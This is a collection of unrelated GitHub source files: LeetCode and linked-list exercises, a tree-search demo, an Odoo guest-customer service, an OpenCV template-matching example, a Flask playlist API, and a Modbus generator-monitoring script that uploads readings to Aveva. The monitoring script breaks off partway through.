we step from 0 to 1.\nOn the second move we step from 1 to -1.\nOn the third move we step from -1 to 2.\nNote:\ntarget will be a non-zero integer in the range [-10^9, 10^9].\n\"\"\"\n\n\nclass Solution:\n def reachNumber(self, target: int) -> int:\n \"\"\"\n math\n\n put -/+ for 1, 2, 3, 4, ..., k\n flip a sign change in even number\n\n if target negative, flip the sign. 
Thus, we can only consider positive\n number\n \"\"\"\n target = abs(target)\n s = 0\n k = 0\n while s < target:\n k += 1\n s += k\n\n delta = s - target\n if delta % 2 == 0:\n return k\n else: # delta is odd\n if (k + 1) % 2 == 1:\n return k + 1\n else:\n return k + 2\n","repo_name":"algorhythms/LeetCode","sub_path":"754 Reach a Number.py","file_name":"754 Reach a Number.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":843,"dataset":"github-code","pt":"81"} +{"seq_id":"42116882946","text":"from tree import TreeNode \nfrom breath_first_search import bfs\nfrom bfs import breathfirtsearch\nfrom depth_first_search import dfs\n\n\nroot_node = TreeNode(\"Desktop\")\nwork_folder = TreeNode(\"Work\")\nschool_folder = TreeNode(\"School\")\nproject_folder = TreeNode(\"Project\")\n\nroot_node.children = [work_folder, school_folder, project_folder]\nmy_wish = TreeNode(\"WishList.txt\")\nmy_todo = TreeNode(\"TodoList.txt\")\nmy_cat = TreeNode(\"Fluffy.jpg\")\nmy_dog = TreeNode(\"Spot.jpg\")\nmy_horse = TreeNode(\"Horse.jpg\")\nmy_work = TreeNode(\"Work.jpg\")\n\nwork_folder.children = [my_todo, my_work]\nschool_folder.children = [my_cat, my_horse]\nproject_folder.children = [my_dog, my_wish]\n\nfinding_path = bfs(root_node, \"Work.jpg\")\nfinding_path_dfs = bfs(root_node, \"Work.jpg\")\n\nif finding_path is None:\n print(\"Path not found\")\nelse:\n print(\"Path found using BFS\")\n for path in finding_path:\n print(path.value)\n\nif finding_path is not None:\n print(\"Path found using DFS\")\n for path in finding_path_dfs:\n print(path.value)\nelse:\n print(\"No path found\")","repo_name":"nidup1010/algorithms-and-data-structures","sub_path":"trees/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30781779863","text":"from werkzeug.exceptions import Forbidden, NotFound\n\nfrom odoo.addons.component.core import Component\n\n\nclass GuestService(Component):\n _name = \"shopinvader.guest.service\"\n _inherit = \"shopinvader.customer.service\"\n _usage = \"guest\"\n\n # The following method are 'public' and can be called from the controller.\n def create(self, **params):\n if not self.shopinvader_backend.is_guest_mode_allowed:\n raise Forbidden(\"Guest mode not allowed.\")\n params[\"is_guest\"] = True\n self._archive_existing_binding(params[\"email\"])\n resp = super().create(**params)\n resp[\"store_cache\"][\"customer\"][\"is_guest\"] = True\n return resp\n\n def search(self, email):\n \"\"\"\n Search for guest with email\n :param email:\n \"\"\"\n res = self._get_binding(email)\n return {\"found\": len(res) > 0}\n\n def register(self, email, external_id):\n \"\"\"\n Called to transform a guest account into a registered curtomer account\n :param email:\n :param external_id:\n \"\"\"\n binding = self._get_binding(email)\n if not binding:\n raise NotFound(email)\n binding.write({\"is_guest\": False, \"external_id\": external_id})\n self.work.partner = binding.record_id\n return self._prepare_create_response(binding)\n\n def stop(self, email):\n \"\"\"\n Called to invalidate the guest mode into the current session\n \"\"\"\n binding = self._get_binding(email)\n if not binding:\n raise NotFound(email)\n return {\"store_cache\": {\"customer\": {}}}\n\n # The following method are 'private' and should be never never NEVER call\n # from the controller.\n # All params are trusted as they have been checked before\n\n 
def _validator_create(self):\n schema = super()._validator_create()\n if \"external_id\" in schema:\n schema.pop(\"external_id\")\n return schema\n\n def _validator_search(self):\n return {\"email\": {\"type\": \"string\", \"required\": True}}\n\n def _validator_return_search(self):\n return {\"found\": {\"type\": \"boolean\", \"required\": True}}\n\n def _validator_register(self):\n return {\n \"email\": {\"type\": \"string\", \"required\": True},\n \"external_id\": {\"type\": \"string\", \"required\": True},\n }\n\n def _validator_stop(self):\n return {\"email\": {\"type\": \"string\", \"required\": True}}\n\n def _send_welcome_message(self, binding):\n if binding.is_guest:\n self.shopinvader_backend._send_notification(\n \"guest_customer_welcome\", binding.record_id\n )\n else:\n super()._send_welcome_message(binding)\n\n def _get_binding(self, email):\n domain = [\n (\"email\", \"=\", email),\n (\"is_guest\", \"=\", True),\n (\"backend_id\", \"=\", self.shopinvader_backend.id),\n ]\n return self.env[\"shopinvader.partner\"].search(domain, limit=1)\n\n def _archive_existing_binding(self, email):\n \"\"\"\n If a previous guest binding already exists: Archive...\n \"\"\"\n binding = self._get_binding(email)\n if binding:\n binding.active = False\n binding.flush()\n\n def _to_customer_info(self, partner):\n info = super()._to_customer_info(partner)\n info.update({\"email\": self.partner.email})\n return info\n","repo_name":"shopinvader/odoo-shopinvader","sub_path":"shopinvader_guest_mode/services/guest_service.py","file_name":"guest_service.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"81"} +{"seq_id":"41209623871","text":"# 템플릿 매칭으로 객체 위치 검출\r\n# 템플릿 매칭은 크기, 방향, 회전 등의 변화에는 약하고 속도가 느린 단점이 있다\r\n\r\n# 찾을 물체가 있는 영상을 준비해 두고 그 물체가 포함되어 있을 것이라 예상되는\r\n# 입력 영상과 비교해서 물체가 매칭되는 위치를 찾는다.\r\n# 미리 준비해둔 미리 찾을 물체 영상을 템플릿 영상이라고 함\r\n\r\n# 템플릿 영상은 입력 영상보다 항상 크기가 작아야 한다.\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\n# 입력 영상\r\nimg = cv2.imread(\"./img/figures.jpg\")\r\n# 템플릿 영상\r\ntemplate = cv2.imread(\"./img/taekwonv1.jpg\")\r\nth, tw = template.shape[:2]\r\ncv2.imshow(\"template\", template)\r\n\r\n# 세 가지 매칭 메서드 순회\r\n\r\n# 매칭 메서드 종류 9개 중 현재 사용중인 매칭 3가지\r\n# cv2.TM_CCOEFF_NORMED : 상관계수 매칭의 정규화, 완벽 매칭 = 1, 나쁜 매칭 = -1\r\n# cv2.TM_CCORR_NORMED : 상관관계 매칭의 정규화, 완벽 매칭 = 큰 값, 나쁜 매칭 = 0\r\n# cv2.TM_SQDIFF_NORMED : 제곱 차이 매칭의 정규화, 완벽 매칭 = 0, 나쁜 매칭 = 큰 값\r\nmethods = [\"cv2.TM_CCOEFF_NORMED\", \"cv2.TM_CCORR_NORMED\", \"cv2.TM_SQDIFF_NORMED\"]\r\n\r\n\r\nfor i, method_name in enumerate(methods):\r\n img_draw = img.copy()\r\n method = eval(method_name)\r\n # 템플릿 매칭\r\n # cv2.matchTemplate(입력영상, 템플릿 영상, 매칭 메서드)\r\n res = cv2.matchTemplate(img, template, method)\r\n # 최대, 최소 값과 그 좌표 구하기\r\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\r\n print(method_name, min_val, max_val, min_loc, max_loc)\r\n \r\n # cv2.TM_SQDIFF 의 경우 최소 값이 좋은 매칭, 나머지는 반대\r\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\r\n top_left = min_loc\r\n match_val = min_val\r\n \r\n else:\r\n top_left = max_loc\r\n match_val = max_val\r\n \r\n # 매칭 좌표를 구해서 빨간색 사각형으로 표시\r\n bottom_right = (top_left[0] + tw, top_left[1] + th)\r\n cv2.rectangle(img_draw, top_left, bottom_right, (0,0,255), 2)\r\n # 매칭 값 표시\r\n cv2.putText(img_draw, str(match_val), top_left, cv2.FONT_HERSHEY_PLAIN,\\\r\n 2, (0,255,0), 1, cv2.LINE_AA)\r\n cv2.imshow(method_name, 
img_draw)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"jso303/OpenCV_Python","sub_path":"Chapter08/template_matching.py","file_name":"template_matching.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13010496449","text":"# -*- coding: utf-8 -*-\nfrom listentoitlater import app\nfrom listentoitlater.db.db import *\nfrom listentoitlater.controllers.index import json_response\nfrom listentoitlater.controllers.mail import send_email\nfrom flask import request, jsonify, make_response, Response\nfrom flask_login import current_user, login_required\n\n#----------- RESTful API\n# for versioning in the future use request.headers['Accept'] and\n# check if it gets \"application/crately.1.0+json\"\n#\n# for error handling on clients which don't accept other than 200\n# use supress_response_code=true in the url\n# and use method=get for the other options\n\n# Status codes:\n# 200 - OK\n# 404 - Not Found\n\n\n@app.errorhandler(400)\ndef bad_request(error):\n if \"application/json\" in request.accept_mimetypes:\n return jsonify(message='Bad Request' + error.description, status=error.code) # error.description or 'Bad Request'\n\n html = (\n '\\n'\n '400 Bad Request\\n'\n '

Bad Request

\\n'\n '

The browser (or proxy) sent a request that this server could'\n 'not understand.

'\n )\n return make_response(html, 400)\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n if \"application/json\" in request.accept_mimetypes:\n return Response({'message': 'This page does not exist', 'status': error.code}, 404, mimetype='application/json')\n\n html = (\n '\\n'\n '404 Not Found\\n'\n '

Not Found

\\n'\n '

The requested URL was not found on the server.

'\n '

If you entered the URL manually please check your spelling and try again.

'\n )\n return make_response(html, 404)\n\n\n@app.route('/api/user/me', methods=[\"GET\"])\n@login_required\ndef me():\n return json_response(str(current_user))\n\n\n@app.after_request\ndef after_request(response):\n if request.method in ['OPTIONS', 'POST']:\n origin = request.headers.get('Origin', '')\n response.headers.add('Access-Control-Allow-Origin', origin)\n response.headers.add('Access-Control-Max-Age', 1000)\n response.headers.add('Access-Control-Allow-Credentials', 'true')\n response.headers.add('Access-Control-Allow-Methods', 'HEAD, GET, PUT, POST, OPTIONS, DELETE')\n response.headers.add('Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept')\n return response\n\n\n#----------- User's playlist\n# GET, POST(replace), PUT(create) and DELETE a specific or all playlists\n@app.route('/api/user//playlists', methods=['GET', 'PUT', 'DELETE'])\n@app.route('/api/user//playlists/', methods=['GET', 'POST', 'PUT', 'DELETE'])\n@login_required\ndef playlists(username, id=None, default=False):\n \"\"\"\n Returns the playlists of the current user by allowing to GET, PUT(create) or DELETE methods.\n\n >>> ctx = app.test_request_context('/api/user/me/playlists')\n >>> ctx.push()\n >>> print playlists()\n \n \"\"\"\n if username == 'me':\n if request.method == \"GET\":\n if id is not None:\n # GET/return a specific user's playlist (id)\n for playlist in current_user._user.playlists:\n if playlist.title == id:\n return json_response(json.dumps(playlist, default=encode_model))\n return jsonify(result='playlist not found', status=404)\n else:\n # GET/return a all user's playlists (limit?)\n # TODO user pagination => ie. ?page=2&per_page=20\n return json_response(json.dumps(current_user._user.playlists, default=encode_model))\n pass\n\n elif request.method == \"PUT\" and request.mimetype == 'application/json':\n if id is not None:\n # PUT/update a specific user's playlist and return the number of recordings\n data = request.json\n return jsonify(data=data)\n else:\n # PUT/update all user's playlist and return the number of playlists\n\n prevlen = len(current_user._user.playlists)\n current_user._user.playlists = []\n\n sc = Platform(name='SoundCloud', url=\"http://soundcloud.com\")\n #yt = Platform(name='Youtube', url=\"http://youtube.com\")\n\n playlists = request.json\n for playlist in playlists:\n playlist_recordings = []\n for recording in playlist['recordings']:\n #platform = Platform()\n #if recording['platform']['name'].lower() == 'soundcloud':\n platform = sc\n #elif recording['platform']['name'].lower() == 'youtube':\n # platform = yt\n # TAGS are missing\n found_or_new_rec = Recording.objects.get_or_create(title=recording['title'], duration=recording['duration'], recording_id=recording['recording_id'], platform_user_id=recording['platform_user_id'], url=recording['url'], platform=platform, artwork_url=recording['artwork_url'])[0]\n playlist_recordings.append(found_or_new_rec)\n # TAGS are missing\n current_user._user.playlists.append(Playlist(title=playlist['title'], default=playlist['default'], recordings=playlist_recordings))\n current_user._user.save()\n return jsonify(prevlen=prevlen, data=len(current_user._user.playlists))\n\n elif request.method == \"POST\" and request.mimetype == 'application/json':\n if id is None or id != 'Favorites':\n return jsonify(result='can only add audio tracks to Favorites FTM, not ' + id)\n\n # POST/add a specific user's playlist (Favorites)\n else:\n users_playlists = current_user._user.playlists\n\n if request.json is None:\n 
return jsonify(result='request empty')\n\n recording = request.json\n result = 'playlist not found'\n for playlist in users_playlists:\n if playlist.title == id:\n sc = Platform(name='SoundCloud', url=\"http://soundcloud.com\")\n platform = sc\n found_or_new_rec = Recording.objects.get_or_create(title=recording['title'], duration=recording['duration'], recording_id=recording['recording_id'], platform_user_id=recording['platform_user_id'], url=recording['url'], platform=platform, artwork_url=recording['artwork_url'])[0]\n playlist['recordings'].append(found_or_new_rec)\n\n result = recording\n break\n\n current_user._user.save()\n\n # Add username and date_registered to log who's adding a track from the Bookmarklet (Mixpanel)\n result['username'] = str(current_user._user.username)\n result['date_registered'] = str(current_user._user.date_registered.isoformat())\n # print result['date_registered']\n return jsonify(result=result)\n\n elif request.method == \"DELETE\":\n if id is not None:\n # DELETE a specific user's playlist\n pass\n else:\n # DELETE all the playlists\n pass\n else:\n return jsonify(result='unsupported method called')\n else:\n return jsonify(result='only user supported in api is \"me\" called')\n\n\n#----------- Recordings\n@app.route('/api/recordings/', methods=['GET', 'POST'])\n@login_required\ndef recordings(id=None):\n if id is not None:\n # if (id) is a URL\n if id.startswith(\"http://\") or id.startswith(\"https://\"):\n # url = id\n # Get information about a song by the song URL. The URL can be a direct link to a Soundcloud or Youtube song. If the URL is not already in Crate.ly a new song recording will be created.\n if request.method == \"GET\":\n # Recording.objects.get_or_create()\n pass\n else:\n return jsonify(result='unsupported method called')\n\n # else if (id)\n else:\n if request.method == \"GET\":\n # GET and return a specific recording\n pass\n elif request.method == \"POST\":\n # POST/update a specific recording\n pass\n else:\n return jsonify(result='unsupported method called')\n else:\n return jsonify(result='id or url not provided')\n\n\n@app.route('/hello//')\ndef hello(subject, to_address):\n tags = [\"test\"]\n if send_email(subject, to_address, tags)[0]['status'] == \"sent\":\n return \"email sent successfully\"\n","repo_name":"gianpaj/crately","sub_path":"listentoitlater/controllers/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"39719248374","text":"\"\"\"\nGiven a singly linked list A, determine if its a palindrome. 
Return 1 or 0 denoting if its a palindrome or not, respectively.\n\"\"\"\nclass ListNode:\n def __init__(self, val):\n self.val = val\n self.next = None\n \nclass Solution:\n def findmid(self, head):\n s, f = head, head\n while f.next != None:\n s = s.next\n f = f.next\n if f.next != None:\n f = f.next\n return s\n\n def reversell(self, head):\n prev = None\n curr = head\n next = curr.next\n while curr:\n curr.next = prev\n prev = curr\n curr = next\n if curr:\n next = curr.next\n return prev\n\n def lPalin(self, A):\n if A.next is None:\n return 0\n\n #check mid\n s = self.findmid(A)\n\n temp = A\n while temp.next != s:\n temp = temp.next\n temp.next = None\n\n two = self.reversell(s)\n one = A\n\n while one:\n if one.val != two.val:\n return 0\n one = one.next\n two = two.next\n return 1\n\n\na = ListNode(1)\nb = ListNode(1)\nc = ListNode(2)\nd = ListNode(1)\ne = ListNode(3)\nf = ListNode(2)\ng = ListNode(1)\n#a.next = b\n#b.next = c\nc.next = d\n#d.next = e\ne.next = f\nf.next = g\n\nt = Solution()\nprint(t.lPalin(a))","repo_name":"anurag5398/DSA-Problems","sub_path":"LinkedList/PalindromeList.py","file_name":"PalindromeList.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30340108593","text":"import logging\nimport logging.handlers as handlers\nimport random\nimport time\nimport os\nimport sqlite3\nimport serial\nimport socket\nimport requests\nimport json\nimport ast\nimport datetime\nfrom concurrent import futures\nfrom persistqueue import FIFOSQLiteQueue as q_persistente # Para crear pila persistente en disco\nfrom pymodbus.client.sync import ModbusSerialClient as MBus_rtu # Crea clientes modbus\nfrom pymodbus.client.sync import ModbusTcpClient as MBus_TCP\nfrom rd_wr_DB import read_from_db, update_to_db, create_to_db, drop_db\n\n# if os.getcwd() != 'siempre':\n# os.chdir('./siempre')\nwork_dir=os.getcwd()\n# print(work_dir)\n\n# Globales:\nDB = 'db.sqlite3'\ntest_internet = False\ntest_aveva = False\n\nlogger = logging.getLogger('siempre.Log')\nlogger.setLevel(logging.INFO)\nlogHandler= handlers.RotatingFileHandler('siempre.log',maxBytes=5*1024*1024, backupCount=5)\nlogHandler.setLevel(logging.INFO)\nlogger.addHandler(logHandler)\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nlogHandler.setFormatter(formatter)\nlogger.addHandler(logHandler) \nlogger.info('-------------Inicialización Siempre-------------')\nlogger.info(f'Directorio de trabajo: {work_dir}')\n\n#---------------------------------------------------------------------------------------\n\ndef load_initial_configuration():\n \"\"\"Carga la configuración inicial del software\"\"\"\n INITIAL_QUERY = 'SELECT * FROM equipos_equipo'\n initial_configuration = read_from_db(DB,INITIAL_QUERY) \n return initial_configuration\n\ndef set_DB (initial_configuration):\n query_vaciar_interno = f\"DELETE FROM equipos_interno WHERE var_name > 0\"\n update_to_db(DB,query_vaciar_interno)\n \n for each in initial_configuration:\n internal_name = each['internal_name']\n control = each['control']\n engine_model = each['engine_model']\n voltaje = each['voltaje']\n \n ################### DB process #################### \n db_query_drop = f'DROP TABLE IF EXISTS {internal_name}'\n drop_db(DB, db_query_drop)\n \n db_query_create= f'CREATE TABLE \"{internal_name}\" (\"internal_name\" varchar(50), \"var_name\" varchar(30), \"valor_output\" varchar(30), \"minimo\" real, \"maximo\" real)'\n create_to_db(DB, 
db_query_create)\n \n db_query_insert = f'INSERT INTO {internal_name} (var_name, minimo, maximo) SELECT var_name, minimo, maximo FROM equipos_out_var WHERE engine_model = \"{engine_model}\" AND control = \"{control}\" AND voltaje = \"{voltaje}\"'\n update_to_db(DB,db_query_insert)\n \n db_query_insert2 = f\"INSERT INTO {internal_name} (var_name) VALUES ('comm_socket'), ('comm_test_socket'), ('comm_device_test')\"\n create_to_db(DB,db_query_insert2)\n \n db_query_update= f\"UPDATE {internal_name} SET internal_name = '{internal_name}'\"\n update_to_db(DB, db_query_update)\n \n db_query_insert3= f\"INSERT INTO equipos_interno (internal_name, var_name, valor_output, minimo, maximo) SELECT * FROM {each['internal_name']}\"\n update_to_db(DB, db_query_insert3)\n \n db_query = f\"DROP TABLE IF EXISTS {internal_name}\"\n drop_db(DB, db_query)\n \ndef update_global_status_values(internet, aveva): \n \n update_db_query=f\"\"\"UPDATE equipos_status_var SET internet_connection = {internet}, aveva_connection = {aveva}\"\"\"\n update_to_db(DB,update_db_query)\n \ndef internet_test():\n IP = '8.8.8.8'\n URL = 'https://online.wonderware.com' #'https://online.wonderware.com/apis/upload/datasource'\n \n while True: \n test_internet = chk_internet_socket()\n test_aveva = chk_internet_socket(host=URL, url_or_ip= 'url')\n update_global_status_values(test_internet,test_aveva)\n if test_internet == False or test_aveva == False:\n logger.error (f'Conexión a Internet = {test_internet} -- Conexión a Aveva = {test_aveva}')\n else:\n logger.info (f'Conexión a Internet = {test_internet} -- Conexión a Aveva = {test_aveva}')\n time.sleep(60)\n\ndef chk_internet_socket(host= '8.8.8.8' ,url_or_ip = 'ip' , timeout=10):\n \"\"\" Verifica si existe conexion con el host.\n ...\n \n Args\n ----\n host (str, optional):\n Puede ser una IP ejem.: 1.1.1.1 o una url. Default: '8.8.8.8'.\n url_or_ip (str, optional):\n Definir: \"url\" o \"ip\". Default: 'ip'.\n timeout (int, optional):\n Default: 10.\n\n Returns\n -------\n Boolean:\n Retorna si hay conexion al host.\n \"\"\"\n try:\n if url_or_ip == 'ip':\n port=53\n socket.setdefaulttimeout(timeout)\n socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((host, port))\n return True\n else: \n request = requests.get(host, timeout=timeout) \n return True\n except socket.error as ex:\n return False\n except (requests. ConnectionError, requests. 
Timeout) as exception:\n return False\n\ndef crear_conector(device):\n \"\"\"Aqui se crea la conexion con cada puerto\"\"\"\n communication_mode = device['communication_mode']\n internal_name = device['internal_name']\n comm_socket=False\n test_socket=False \n try:\n if communication_mode == 'rtu': \n modbus = MBus_rtu(method='rtu',port=device['port'],baudrate=int(device['baudrate']),databits=device['databits'],parity=device['parity'],stopbits=device['stopbits'])\n if modbus:\n comm_socket=True\n logger.info(f\"Se creo conector RTU con dispositivo: {internal_name} en purto: {device['port']}\") \n socket = verificacion_nodo(modbus, internal_name)\n if socket: \n test_socket = True\n\n if communication_mode == 'TCP':\n modbus = MBus_TCP(method='tcp', host=device['IP'], port=device['port'])\n if modbus:\n comm_socket=True\n logger.info(f\"Se creo conector TCP con dispositivo: {internal_name} en la IP: {device['IP']}\") \n socket = verificacion_nodo(modbus, internal_name)\n if socket: test_socket = True\n \n if communication_mode == 'RS232':\n port = device['port']\n baudrate = int(device['baudrate'])\n databits = device['databits']\n parity = device['parity']\n stopbits = int(device['stopbits']) \n conector_RS232 = serial.Serial(port=port, baudrate=baudrate, bytesize=databits, parity=parity, stopbits=stopbits)\n if conector_RS232.is_open == True:\n logger.info(f'Se creo conector serie con puerto: {port}')\n socket=conector_RS232\n comm_socket=True\n test_socket=True\n else:\n socket=None\n test_socket = False\n \n # Falta implementar DIESEL \n except Exception as e: \n logger.error('Modulo: \"crear_conector\" - ',e)\n comm_socket=False\n test_socket=False\n \n \n finally:\n query_socket = f\"UPDATE 'equipos_interno' SET valor_output = {comm_socket} WHERE var_name = 'comm_socket' AND internal_name = '{internal_name}'\"\n query_test_socket = f\"UPDATE 'equipos_interno' SET valor_output = {test_socket} WHERE var_name = 'comm_test_socket' AND internal_name = '{internal_name}'\"\n update_to_db(DB,query_socket)\n update_to_db(DB,query_test_socket)\n return socket\n \ndef verificacion_nodo(socket, internal_name):\n \"\"\"Aqui se verifica la comunicación con cada nodo. Una conexion por puerto.\"\"\"\n intentos=0\n try:\n while intentos < 11: #Verifica puerto Abierto\n if intentos < 10:\n socket.connect()\n if socket.socket: # Intenta conexión con puerto modbus\n break\n else:\n logger.warning(f'Modbus en \"{internal_name}\" sin conexion. Intento de conexión: {intentos}')\n time.sleep(0.2)\n intentos += 1\n\n if not socket.socket:\n socket.close()\n logger.error(f'Sin conexion Modbus en \"{internal_name}\" - Fuera de servicio')\n else:\n logger.info(f'Conexion Modbus con \"{internal_name}\" - OK')\n \n except Exception as e_test: \n logger.error(f\"{e_test}\")\n socket=None\n finally:\n return socket\n \ndef control_communication_test(self, sck):\n \"\"\"Verifica la comunicación con cada control y guarda el estado en la base de datos.\"\"\"\n \n result_comm_test = False\n intentos=0\n while intentos < 15:\n try:\n test_lectura= sck.read_holding_registers(address=1600,count=1,unit=int(self.slave))\n if test_lectura.function_code == 3:\n logger.info(f\"Conexión con {self.internal_name} establecida -- OK. 
Valor: {test_lectura.registers[0]}\")\n result_comm_test = True\n break \n except Exception as e_test_control:\n result_comm_test = False\n logger.error(f\"Error de comunicación con control: {self.internal_name} --> {e_test_control}\")\n finally:\n intentos+=1\n if result_comm_test == False: logger.error(f\"Sin conexion con control de {self.internal_name} --> Fuera de servicio\")\n \n query_comm_test = f\"UPDATE 'equipos_interno' SET valor_output = {result_comm_test} WHERE var_name = 'comm_device_test' AND internal_name = '{self.internal_name}'\"\n update_to_db(DB,query_comm_test)\n \n return result_comm_test\n\nclass lectura_equipo():\n \n \"\"\"Esta clase crea un proceso por cada equipo\"\"\" \n def __init__(self, device): \n self.internal_name = device['internal_name']\n self.communication_mode = device['communication_mode']\n self.port = device['port']\n self.slave = device['slave']\n self.pila = q_persistente(path=f\"./buffer/{self.internal_name}\",multithreading=True)\n self.engine_model = device['engine_model']\n self.control = device['control']\n self.token = device['token']\n self.voltaje = device['voltaje']\n \n # carga variables de entrada: \n vars_input_query = f\"SELECT var_name, address, bit, multiplicador, signo, tratamiento FROM equipos_in_var WHERE engine_model = '{self.engine_model}' AND control = '{self.control}'\"\n self.in_vars = read_from_db(DB, vars_input_query)\n \n # carga variables de salida: \n vars_output_query = f\"SELECT * FROM equipos_interno WHERE internal_name = '{self.internal_name}'\"\n self.out_vars = read_from_db(DB, vars_output_query)\n \n #configura el modo de lectura modbus (esto disminuye el tiempo de lectura desde el control):\n self.mode = self.load_mode()\n \n #parametros iniciales:\n self.read_list=[]\n status_send = True\n \n ###########################################################################\n #Loop infinito de conexion y reconexion:\n while True:\n ###########################################################################\n #Loop infinito de envio de datos:\n read_times = 0\n read_alarmas = False\n try:\n socket = crear_conector(device)\n # test_device_comm()\n comm_test = control_communication_test(self, socket)\n if comm_test == False:\n continue\n else:\n while socket.socket:\n \n if read_times >= 10:\n status_send = self.send_read_list(read_list = self.read_list)\n if status_send == False:\n self.save_in_buffer(read_list=self.read_list)\n read_times = 0\n self.read_list=[]\n else:\n if read_times >= 9: read_alarmas = True\n lectura = self.read_device(socket = socket, read_alarmas= read_alarmas)\n self.send_to_db(lectura)\n self.read_list.append(lectura) \n read_times +=1\n except Exception as ex:\n logger.error(f\"Falla en modulo principal de lectura. 
Interno {self.internal_name}.\",ex) \n\n logger.error (f\"Falla de conexión de socket en {self.internal_name}\")\n time.sleep(10) # Espera para intentar reconexion\n \n def read_device(self, socket, read_alarmas = False):\n read_device_dict = {}\n \n aux_apendice=[]\n aux_list_keys=[]\n aux_vars_leidas={}\n\n try:\n for key, rango in self.mode.items():\n read_registers=socket.read_holding_registers(key-1,rango,unit=int(self.slave))\n \n aux_apendice.extend(read_registers.registers)\n for i in range(key,(key+rango)):\n aux_list_keys.append(i)\n \n # Acondiciona los datos leidos:\n aux_dict_leido= dict(zip(aux_list_keys,aux_apendice))\n\n for valor in self.in_vars:\n var = valor['var_name']\n address = valor['address'] \n if address in aux_dict_leido:\n aux_vars_leidas[var]=aux_dict_leido.get(address)\n read_device_dict = self.calculos(aux_vars_leidas)\n \n # Limita maximos y minimos: \n read_device_dict = self.limitar_max_min(read_device_dict)\n \n # Insertar variables de estado por equipo:\n query_status = f\"SELECT var_name, valor_output FROM 'equipos_interno' WHERE internal_name = '{self.internal_name}' AND var_name LIKE 'comm_%' \"\n status_vars = read_from_db(DB,query_status)\n for each in status_vars:\n read_device_dict[each.get('var_name')] = each.get('valor_output')\n \n # Insertar variables de estado globales:\n query_global_status = f\"SELECT internet_connection, aveva_connection FROM equipos_status_var\"\n global_status_vars = read_from_db(DB,query_global_status)\n read_device_dict[\"internet_connection\"] = global_status_vars[0].get('internet_connection')\n read_device_dict[\"aveva_connection\"] = global_status_vars[0].get('aveva_connection')\n \n # Se agrega TimeStamp:\n hora = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'\n read_device_dict[\"DateTime\"]= str(hora)\n read_device_dict['Hora_lectura']= str(hora)\n \n # Lectura de alarmas:\n if read_alarmas == True:\n leer_alarmas(aux_dict_leido,self.internal_name,self.control)\n \n except Exception as ex:\n logger.error(f\"Modulo Read device {self.internal_name}:\\n{ex}\")\n return None\n \n return read_device_dict\n \n def send_read_list(self, read_list):\n HEADER = {\n 'Content-Type': 'application/json',\n 'x-filename': self.internal_name + '.json',\n 'Authorization': self.token}\n\n URL = 'https://online.wonderware.com/apis/upload/datasource' \n \n try:\n str_read_list = json.dumps(read_list, indent = 4)\n payload = '{\"data\": ' + str_read_list + '}'\n #Request de envio a Aveva; \n request_response = requests.request(\"POST\", url=URL, headers=HEADER, data=payload, timeout=3)\n if request_response: response = True \n except Exception as ex:\n response = False\n test_internet=chk_internet_socket()\n test_aveva = chk_internet_socket(host= URL, url_or_ip='url')\n update_global_status_values(internet = test_internet, aveva=test_aveva)\n logger.error(f\"Modulo: send_read_list() -- Error de servidor o token. {self.internal_name}:\\n{ex}\")\n return response\n \n def save_in_buffer(self, read_list): \n try:\n pila = q_persistente(path=f\"./buffer/{self.internal_name}\",multithreading=True)\n pila.put(read_list) # Envia el str a una pila archivada\n pila.task_done()\n logger.warning(f'{self.internal_name} - Error de timeout o conexión con servidor. 
Se guardan los datos en Buffer.') \n except Exception as e:\n logger.error('Modulo: guardar_datos():\\n{e}') \n pass \n \n def calculos(self,var_leidas):\n salida={}\n for variable_entrada in self.in_vars:\n var_name = variable_entrada['var_name']\n \n if variable_entrada['signo'] == 'Signed': # Unisigned a Signed 16bit\n if var_leidas.get(var_name) > 32767:\n var_leidas[var_name] = var_leidas.get(var_name) - (2 ** 16)\n \n if variable_entrada['tratamiento'] == 'String': \n if var_leidas.get('Estado_Genset') == 0: salida['Estado_Genset'] = 'Stopped'\n elif var_leidas.get('Estado_Genset') == 1: salida['Estado_Genset'] = 'Start Pending'\n elif var_leidas.get('Estado_Genset') == 2: salida['Estado_Genset'] = 'Warm Up at IDLE'\n elif var_leidas.get('Estado_Genset') == 3: salida['Estado_Genset'] = 'Running'\n elif var_leidas.get('Estado_Genset') == 4: salida['Estado_Genset'] = 'Cooldown at Rated'\n elif var_leidas.get('Estado_Genset') == 5: \n salida['Estado_Genset'] = 'Cooldown as IDLE'\n else: \n salida['Estado_Genset'] = 'Unknow' \n if var_leidas.get('Modo_Control') == 0: salida['Modo_Control'] = 'OFF'\n elif var_leidas.get('Modo_Control') == 1: salida['Modo_Control'] = 'Run/Manual'\n elif var_leidas.get('Modo_Control') == 2: salida['Modo_Control'] = 'Automatico'\n else: salida['Modo_Control'] = 'Unknow'\n \n if variable_entrada['tratamiento'] == 'Bit':\n mascara= 2**(int(variable_entrada.get('bit')))\n if (var_leidas.get(var_name) & mascara) > 0: # Realiza AND con mascara y verifica bit leido.\n salida[var_name] = 1\n else:\n salida[var_name] = 0\n \n if variable_entrada['tratamiento'] == 'Directo': \n salida[var_name] = var_leidas.get(var_name)\n\n if variable_entrada['tratamiento'] == 'Temperatura1': 